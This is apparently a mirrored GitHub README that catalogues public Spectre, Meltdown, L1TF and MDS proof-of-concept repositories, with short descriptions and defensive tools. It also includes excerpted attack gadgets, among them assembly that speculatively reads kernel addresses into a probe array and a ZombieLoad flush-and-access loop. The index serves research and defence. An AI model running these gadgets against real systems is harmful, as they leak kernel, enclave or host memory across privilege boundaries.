时空索引>> Spectre_Meltdown_MDS_srcs>> 返回
项目作者: morning21

项目描述 :
Collection of Spectre-type, Meltdown-type and MDS-type PoCs
高级语言:
项目地址: git://github.com/morning21/Spectre_Meltdown_MDS_srcs.git
创建时间: 2020-08-11T14:04:47Z
项目社区:https://github.com/morning21/Spectre_Meltdown_MDS_srcs
开源协议:
下载


Collected from existing repos, this repo lists known Spectre-type, Meltdown-type and MDS-type PoCs.
PRs are welcome.

If you want to read corresponding codes, please checkout the branch codes.

  1. git clone -b codes https://github.com/morning21/Spectre_Meltdown_MDS_srcs.git

ToC:

1. Collection

1.1 speed47/spectre-meltdown-checker

1.2 mniip/spectre-meltdown-poc

1.3 msmania/microarchitectural-attack

  1. Touch:
  2.   movzx eax, byte [rcx]
  3.   shl rax, 0Ch
  4.   mov al, byte [rax+rdx]
  5.   sysenter

1.4 adamalston/Meltdown-Spectre

2. Spectre-type

2.1 ErikAugust/spectre.c

  1. void victim_function(size_t x)
  2. {
  3.     if (x < array1_size)
  4.     {
  5.         temp &= array2[array1[x] * 512];
  6.     }
  7. }

2.2 lsds/spectre-attack-sgx

  1. void ecall_victim_function(size_t x, uint8_t * array2, unsigned int * outside_array1_size) {
  2.     //if (x < array1_size) {
  3.     if (x < *outside_array1_size) {
  4.          temp &= array2[array1[x] * 512];
  5.      }
  6. }

2.3 opsxcq/exploit-cve-2017-5715

  1. void accessPage(int page) {
  2.   int value=0;
  3.   if (page < indexArraySize) {
  4.     value = value & attackArray[indexArray[page] * PAGE_SIZE];
  5.   }
  6. }

2.4 cgvwzq/spectre

  1. function vul_call(index, sIndex)
  2.     {
  3.         index = index |0;
  4.         sIndex = sIndex |0;
  5.         var arr_size = 0;
  6.         var j = 0;
  7.         junk = probeTable[0]|0;
  8.         // "size" value repeated at different offsets to avoid having to flush it?
  9.         j = (((sIndex << 12) | 0) +  sizeArrayStart)|0;
  10.         arr_size = simpleByteArray[j|0]|0;
  11.         if ((index|0) < (arr_size|0))
  12.         {
  13.             index = simpleByteArray[index|0]|0;
  14.             index = (index << 12)|0;
  15.             index = (index & ((TABLE1_BYTES-1)|0))|0;
  16.             junk = (junk ^ (probeTable[index]|0))|0;
  17.         }
  18.     }

2.5 amosbe/spectre-without-shared-memory

2.6 HexHive/SMoTherSpectre

  1. /* smother gadget */
  2. asm("cmp $0, %%r15;"
  3.     "je MARK;" ::: );
  4. CRC324 CRC322
  5. asm("movl $-1, %%r12d; divl %%r12d;" :::);
  6. asm("MARK:;");
  7. OR16
  8. asm("lfence;" :::);

2.7 mmxsrup/CVE-2018-3639

2.8 Shuiliusheng/CVE-2018-3639-specter-v4-

  1. void victim_function(size_t idx) {
  2.     unsigned char **memory_slot_slow_ptr = *memory_slot_ptr;
  3.     *memory_slot_slow_ptr = public_key;
  4.     tmp = probe[(*memory_slot)[idx] * 4096];
  5. }

3. Meltdown-type

3.1 IAIK/meltdown

3.2 feruxmax/meltdown

  1. int speculative_transfer(int div, uint8_t secret)
  2. {
  3.     uint8_t data = 0;
  4.     int res = 0;
  6.     // rise_exception after delay
  7.     int a=div;
  8.     for(int i=0;i<100000;i++)
  9.         a+=i;
  10.     data = a / div;
  12.     // speculative
  13.     res += cache[CACHE_LINE_SIZE*secret];
  15.     return res + data;
  16. }

3.3 Frichetten/meltdown-spectre-poc

  1. asm __volatile__ (
  2.            ".global __speculative_byte_load_exit \n\t"
  3.            "%=:                              \n"
  4.            "xorq %%rax, %%rax                \n"
  5.            "movb (%[ptr]), %%al              \n"
  6.            "shlq $0xc, %%rax                 \n"
  7.            "jz %=b                           \n"
  8.            "movq (%[buf], %%rax, 1), %%rbx   \n"
  9.            "__speculative_byte_load_exit:     \n"
  10.            "nop                               \n"
  11.            :
  12.            :  [ptr] "r" (ptr), [buf] "r" (buf)
  13.            :  "%rax", "%rbx");

3.4 paboldin/meltdown-exploit

  1. ; rcx = kernel address
  2. ; rbx = probe array
  3. retry:
  4. mov al, byte [rcx]
  5. shl rax, 0xc
  6. jz retry
  7. mov rbx, qword [rbx + rax]

3.5 Semihalf/spectre-meltdown

  1. __attribute__((noinline)) uint8_t bounds_check(uint64_t idx)
  2. {
  3.     if (idx < array_size) /* no reading outside the array, or is it? */
  4.         return side_effects[base_array[idx] * PAGE_SIZE];
  5.     return 0; /* just return 0 if index is out of range */
  6. }

3.6 gregvish/l1tf-poc.git

  • Link: https://github.com/gregvish/l1tf-poc.git
  • Tool: C, ASM
  • Description: Its README explains the concerns to run the PoC, dumping host memory in a guest. The PoC should run on a VM which is compromised by specific codes. It is necessary to break the mapping of the VM to physical address, which may use a brute force method. It mentions that L1TF succeeds to capture secrets in L1 DCache. Otherwise, no meaningful data will be inferred. 
  1. do_access:
  2.     push %rbx
  3.     push %rdi
  4.     push %rsi
  5.     push %rdx
  7.     // Do the illegal access (rdx is ptr param)
  8.     movb (%rdx), %bl
  9.     // Duplicate result to rax
  10.     mov %rbx, %rax
  12.     // calculate our_buffer_lsb offset according to low nibble
  13.     and $0xf, %rax
  14.     shl $0xc, %rax
  16.     // calculate our_buffer_msb offset according to high nibble
  17.     shr $0x4, %rbx
  18.     and $0xf, %rbx
  19.     shl $0xc, %rbx
  21.     // rsi is our_buffer_lsb param
  22.     mov (%rsi, %rax, 1), %rax
  23.     // rdi is our_buffer_msb param
  24.     mov (%rdi, %rbx, 1), %rbx

4. MDS-type

4.1 ZombieLoad

  • Link: https://github.com/IAIK/ZombieLoad.git
  • Tool: C
  • Description: Besides four ZombieLoad attack scenarios, this repo contains a cacheutils file, which implement the basic elements to construct Flush+Reload attacks, such as the choice of threshold and Flush+Reload function. An embedded disassembly gadget supports accessing address through mov directly.
  1. while (1) {
  2.     // Ensure the kernel mapping refers to a value not in the cache
  3.     flush(mapping);
  5.     // Dereference the kernel address and encode in LUT
  6.     // Not in cache -> reads load buffer entry
  7.     if (!setjmp(trycatch_buf)) {
  8.       maccess(0);
  9.       maccess(mem + 4096 * target[0]);
  10.     }
  11.     recover();
  12. }

4.2 RIDL

5. Related

5.1 oo7

  • Link: https://github.com/winter2020/oo7
  • Tool: JavaScript, Shell
  • Description: Employ control flow extraction, taint analysis and address analysis at the binary level.

5.2 KleesSpectre

  • Link: [https://github.com/winter2020/kleespectre][https://github.com/winter2020/kleespectre]
  • Tool: LLVM
  • Description: Employ a symbolic execution tool, klee, to find suspicious gadgets. It should be noted that the author of this tool is the same as oo7. Compared to taint analysis, symbolic execution is a more fine grained approach. The memory locations accessed by a read/write is captured as symbolic expressions over (tainted) input, instead of simply maintaining that the location accessed by a read/write is tainted.

5.3 SgxPectre

5.4 speculator

5.5 InvisiSpec

5.6 STT

5.7 SpectreGuard

5.8 willyb321/meltdown-spectre-poc-grabber